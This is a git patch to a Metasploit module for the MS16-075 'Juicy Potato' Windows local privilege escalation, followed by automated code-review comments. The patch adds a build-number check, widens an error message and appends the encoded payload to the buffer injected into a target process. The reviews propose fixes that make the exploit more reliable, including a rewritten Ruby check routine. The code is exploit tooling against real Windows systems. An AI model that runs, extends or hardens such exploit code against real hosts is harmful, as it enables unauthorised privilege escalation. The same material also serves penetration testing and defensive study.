From 7653d64c4abd52a6af3654f46ac8ceb89ca2e78a Mon Sep 17 00:00:00 2001
From: phra
Date: Fri, 11 Jan 2019 15:38:57 +0100
Subject: [PATCH] fix: improve exploit check

---
 .../windows/local/ms16_075_reflection_juicy.rb | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
index 7c4c1f1970..dac07bf84b 100644
--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@@ -112,6 +112,14 @@ class MetasploitModule < Msf::Exploit::Local
 def check
 privs = client.sys.config.getprivs
+win10build = client.sys.config.sysinfo['OS'].match /Windows 10 \(Build (\d+)\)/
+if win10build and win10build[1] > '17134'
+return Exploit::CheckCode::Safe
+end
+win2019build = client.sys.config.sysinfo['OS'].match /Windows 2019 \(Build (\d+)\)/
+if win2019build and win2019build[1] > '17134'
+return Exploit::CheckCode::Safe
+end
 if privs.include?('SeImpersonatePrivilege')
 return Exploit::CheckCode::Appears
 end
@@ -129,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Local
 print_status("#{my_target['Arch']}")
 verify_arch(my_target)
 if check == Exploit::CheckCode::Safe
-fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
+fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege or Windows version not supported')
 end
 if my_target.opts['Arch'] == 'x64'
 dll_file_name = 'juicypotato.x64.dll'
@@ -161,6 +169,7 @@ class MetasploitModule < Msf::Exploit::Local
 configuration += "#{datastore['RPC_IP']}\x00"
 configuration += "#{datastore['RPC_PORT']}\x00"
 configuration += "#{datastore['DCOM_IP']}\x00"
+configuration += payload.encoded
 payload_mem = inject_into_process(process, configuration)
 # invoke the exploit, passing in the address of the payload that
 # we want invoked on successful exploitation.
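Review bot: The build comparisons `win10build[1] > '17134'` and `win2019build[1] > '17134'` compare strings lexicographically, so a six-digit build number would sort below '17134' and the check would fall through to reporting Appears on a patched host; convert with `.to_i` before comparing. `client.sys.config.sysinfo['OS']` is also fetched twice, costing a second round trip to the session, and the two branches differ only in the product name, so one match with an alternation covers both strings the hunk matches. Whether sysinfo reports Server 2019 as 'Windows 2019 (Build N)' cannot be confirmed from here; if the real string differs, the new guard silently degrades to the privilege-only check, which is worth a comment. A single-pass version of the added lines:
```ruby
  def check
    privs = client.sys.config.getprivs
    # One sysinfo round trip; compare the build as an integer, not a string.
    # NOTE(review): relies on sysinfo['OS'] having the form "Windows 10 (Build N)" /
    # "Windows 2019 (Build N)"; any other form falls through to the privilege check.
    os_build = client.sys.config.sysinfo['OS'].match(/Windows (?:10|2019) \(Build (\d+)\)/)
    if os_build && os_build[1].to_i > 17134
      return Exploit::CheckCode::Safe
    end
    # … unchanged: SeImpersonatePrivilege check …
```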
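Review bot: `Failure::NoAccess` is now raised for two unrelated conditions — a missing privilege and an unsupported build — and the widened message lumps them together, so the operator cannot tell from the output which one stopped the run. Since `check` already distinguishes the two cases before returning Safe, have it report the cause on the build path, e.g. `vprint_status('Windows build is newer than 17134, target not vulnerable')`, and keep the NoAccess message about privileges only; `Failure::NotVulnerable` is the closer failure reason for the build case if the caller is taught to tell them apart. The enclosing `exploit` method starts before this hunk.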
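Review bot: `configuration += payload.encoded` appends the payload bytes directly after the third NUL-terminated field with no length prefix, so the injected DLL presumably locates the payload by skipping three NULs and takes its length from the buffer handed to `inject_into_process`; that contract is invisible here and deserves a comment, e.g. `# payload bytes follow the three NUL-terminated strings; the DLL reads them to the end of the injected buffer`. If `configuration` was initialised as a UTF-8 literal (its creation is above the hunk), the concatenation with binary payload bytes only works because the preceding fields are ASCII-only; building the buffer as binary from the start (`''.b` or `force_encoding('BINARY')`) would avoid an `Encoding::CompatibilityError` should a datastore value ever contain non-ASCII characters. The enclosing `exploit` method continues past this hunk.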